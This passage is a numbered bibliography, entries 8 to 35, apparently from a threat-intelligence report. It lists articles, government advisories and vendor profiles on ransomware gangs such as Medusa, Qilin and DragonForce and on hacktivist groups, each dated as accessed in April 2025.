8. Exclusive: SafePay claims breach of Aussie fire protection services firm – Cyber Daily, accessed April 17, 2025, https://www.cyberdaily.au/security/12003-exclusive-safepay-claims-breach-of-aus-fire-protection-services-firm
9. Space Bears Ransomware Recovery | Solace Cyber, accessed April 17, 2025, https://solacecyber.co.uk/space-bears-ransomware/
10. #StopRansomware: Medusa Ransomware | CISA, accessed April 17, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
11. ARaaStocracy – RALord ransomware emerges with new DLS – CYJAX, accessed April 17, 2025, https://www.cyjax.com/resources/blog/araastocracy-ralord-ransomware-emerges-with-new-dls/
12. DragonForce Ransomware Group is Targeting Saudi … – Resecurity, accessed April 17, 2025, https://www.resecurity.com/blog/article/dragonforce-ransomware-group-is-targeting-saudi-arabia
13. #StopRansomware: Medusa Ransomware – Internet Crime Complaint Center, accessed April 17, 2025, https://www.ic3.gov/CSA/2025/250312.pdf
14. RALord Ransomware | WatchGuard Technologies, accessed April 17, 2025, https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/ralord
15. The Growing Threat Posed by Hacktivist Groups – Searchlight Cyber, accessed April 17, 2025, https://slcyber.io/blog/the-growing-threat-posed-by-hacktivist-groups/
16. Israel ranks second in list of countries targeted by cyberattacks in 2024 — report, accessed April 17, 2025, https://www.timesofisrael.com/israel-ranks-second-in-list-of-countries-targeted-by-cyberattacks-in-2024-report/
17. Three Months After the Storm: Did Cybercriminals Move to Telegram …, accessed April 17, 2025, https://www.kelacyber.com/blog/three-months-after-the-storm-did-cybercriminals-move-to-telegram-alternatives/
18. Holy League: A Unified Threat Against Western Nations, NATO, India and Israel – Radware, accessed April 17, 2025, https://www.radware.com/security/threat-advisories-and-attack-reports/holy-league-a-unified-threat-against-western-nations/
19. Cyber Intelligence Bureau Orange Cyberdefense, accessed April 17, 2025, https://www.orangecyberdefense.com/fileadmin/global/CyberIntelligenceBureau/Gangs_Investigations/Sector16/Sector16Group.pdf
20. The Exodus Began: Alternatives for Telegram – SOCRadar® Cyber Intelligence Inc., accessed April 17, 2025, https://socradar.io/the-exodus-began-alternatives-for-telegram/
21. Peoples Cyber Army Of Russia | Threat Actor Profile – Cyble, accessed April 17, 2025, https://cyble.com/threat-actor-profiles/peoples-cyber-army-of-russia/
22. NoName057(16): Pro-Russian Hacktivist Group – Radware, accessed April 17, 2025, https://www.radware.com/cyberpedia/ddos-attacks/noname057(16)/
23. New Hacktivist Alliance Emerges: OverFlame and SECTOR16 Join Forces – Cyber Press, accessed April 17, 2025, https://cyberpress.org/overflame-sector16-join/
24. Agenda (Qilin) – SentinelOne, accessed April 17, 2025, https://www.sentinelone.com/anthology/agenda-qilin/
25. Qilin Ransomware: Exposing the TTPs Behind One of the Most Active Ransomware Campaigns of 2024 – Picus Security, accessed April 17, 2025, https://www.picussecurity.com/resource/blog/qilin-ransomware
26. Space Bears Ransomware: What You Need To Know – Tripwire, accessed April 17, 2025, https://www.tripwire.com/state-of-security/space-bears-ransomware-what-you-need-know
27. Atos Group Denies Space Bears’ Ransomware Attack Claims – Infosecurity Magazine, accessed April 17, 2025, https://www.infosecurity-magazine.com/news/atos-denies-space-bears-ransomware/
28. DragonForce Ransomware Group: Tactics, Targets & Mitigation – Cyble, accessed April 17, 2025, https://cyble.com/threat-actor-profiles/dragonforce-ransomware-group/
29. DragonForce Ransomware Hits Saudi Firm, 6TB Data Stolen – Infosecurity Magazine, accessed April 17, 2025, https://www.infosecurity-magazine.com/news/6tb-data-stolen-saudi-cyber-attack/
30. Medusa Ransomware Analysis, Simulation, and Mitigation – CISA Alert AA25-071A, accessed April 17, 2025, https://www.picussecurity.com/resource/blog/medusa-ransomware-cisa-alert-aa25-071a
31. RALord Ransomware, accessed April 17, 2025, https://www.broadcom.com/support/security-center/protection-bulletin/ralord-ransomware
32. Threat Actors Merging Malicious Activity With Cryptocurrency Show How the Attack Landscape is Developing in Decentralized Finance – EclecticIQ Blog, accessed April 17, 2025, https://blog.eclecticiq.com/threat-actors-merging-malicious-activity-with-cryptocurrency-show-how-the-attack-landscape-is-developing-in-decentralized-finance
33. What Is A Zero Day Exploit? 0day Attack – Cyble, accessed April 17, 2025, https://cyble.com/knowledge-hub/zero-day-exploit/
34. Dark Storm Team: The Hacker Group Behind the DDoS Attack on X …, accessed April 17, 2025, https://foresiet.com/blog/dark-storm-team-the-hacker-group-behind-the-ddos-attack-on-x-twitter
35. Global Hacktivist Threats – Graphika, accessed April 17, 2025, https://graphika.com/reports/global-hacktivist-threats